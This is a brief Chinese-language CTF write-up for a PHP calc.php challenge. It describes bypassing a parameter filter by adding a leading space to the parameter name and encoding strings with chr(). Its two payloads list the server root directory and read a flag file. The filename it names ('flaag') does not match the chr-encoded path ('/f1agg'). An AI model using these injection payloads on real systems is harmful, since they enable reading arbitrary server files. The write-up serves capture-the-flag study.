知识点:
- PHP的字符串解析特性
当php进行解析的时候,如果变量前面有空格,会去掉前面的空格再解析
复现:
查看源码,找到calc.php
存在过滤,不能传递字母变量,利用php解析特性,将“num”换为“ num”。再将chr转换为ascll进行绕过。由于查看目录,构造
? num=1;var_dump(scandir(chr(47)))
存在flaag,构造
? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))